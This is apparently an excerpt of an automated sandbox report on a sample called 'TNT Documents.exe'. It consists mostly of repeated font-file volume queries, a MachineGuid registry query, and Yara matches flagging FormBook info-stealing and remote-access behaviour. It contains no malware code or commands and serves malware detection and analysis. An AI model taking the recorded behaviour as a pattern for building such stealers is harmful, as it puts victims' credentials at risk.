          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBook
          Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBook
          Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
